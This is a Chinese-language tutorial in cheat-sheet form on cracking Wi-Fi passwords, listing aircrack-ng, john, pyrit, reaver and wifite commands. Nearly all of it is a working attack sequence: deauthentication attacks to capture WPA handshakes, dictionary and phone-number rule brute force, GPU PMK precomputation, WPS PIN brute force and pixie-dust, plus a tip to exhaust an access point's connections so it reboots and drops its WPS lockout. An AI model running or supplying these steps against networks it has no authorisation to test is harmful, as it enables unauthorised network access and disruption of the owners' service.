无线渗透实操-Aircrack-ng-WPA/WPS

无线渗透实操——Aircrack-ng(WPA/WPS)

启动monitor模式
- airmon-ng start wlan0
查看附近无线信息
- airodump-ng wlan0mon
开始抓包并保存
- airodump-ng wlan0mon -c<channel> --bssid<bssid> -w<filename>
Deauthentication攻击获取四步握手信息
- aireplay-ng -0 <count> -a <ap mac> -c <sta mac> wlan0mon
字典暴破
- aircrack-ng -w /user/share/john/password.list wpa-01.cap

快速的密码破解软件
支持基于规则动态生成密码字典
很多人喜欢用手机号做无线密码
- 获取号段并动态增加后几位数字
配置文件/etc/john/john.conf
- [List.Rules:Wordlist]
- $[0-9]$[0-9]$[0-9]$[0-9]
john --wordlist=yidong.txt --rules --stdout | aircrack-ng -e kifi -w - wpa-01.cap

与airolib、cowpatty相同、支持基于预计算的PMK提高破解速度
独有的优势
- 可以利用GPU
- 本身支持抓包获取四步握手，无需使用Airodump
- 支持读取airodump抓包获取四步握手的方式
只抓WAP四次握手过程包
- pyrit -r wlan0mon -o wpapyrit.cap stripLive
- pyrit -r wpapyrit.cap analyze
从airodump抓包导入并筛选
- pyrit -r wpa.cap -o wpapyrit.cap strip
使用密码直接破解
- pyrit -r wpapyrit.cap -i password.list -b<AP MAC> attack passthrough
数据库模式破解
- 默认使用基于文件的数据库，支持连接SQL数据库，将计算的PMK存入数据库
- 查看默认数据库状态:pyrit eval
- 导入密码字典：pyrit -i password.list import passwords
- 指定ESSID：pyrit -e kifi create essid
- 计算PMK：pyrit batch(发挥GPU计算能力)
- 破解密码：pyrit -r wpapyrit.cap -b <AP MAC> attack db

WPS是WiFi联盟2006年开发的一项技术
- 通过PIN码来简化无线接入的操作，无需记住PSK
- 路由器和网卡各按一个按钮就能接入无线
- PIN码是分为前后各4位的2段共8位数字
安全漏洞
- 2011年被发现安全涉及漏洞
- 接入发起方可以根据路由器的返回信息判断前四位是否正确
- 而PIN码的后4位只有1000种定义的组合（最后一位是checksum）
- 所以全部穷举破解只需要11000次尝试
  - PSK：218340105584896次
- 标准本身没有设计锁定机制，目前多个厂商已经实现锁定机制。

启动侦听模式，发现支持WPS的AP
- wash -C -i wlan0mon
- airodump-ng wlan0mon --wps
爆破pin码
- reaver -i wlan0mon -b <AP MAC> -vv -c <channel>
秒破PIN
- reaver -i wlan0mon -b <AP MAC> -vv -K 1
- 上面的命令其实调用的是pixiewps
- 只适用于固定厂商的芯片，成功率低
从pin码获得密码reaver -i wlan0mon -b <AP MAC> -vv -p 88888888
问题：
- 很多厂家实现了锁定机制，所以爆破时应注意限速
- 一旦触发锁定，可尝试耗尽AP连接数，令其重启并解除WPS锁定
综合自动化无线密码破解工具wifite

插入网卡前先执行

否则插入网卡后wpa_supplicant会对网卡进行初始化，导致操作失败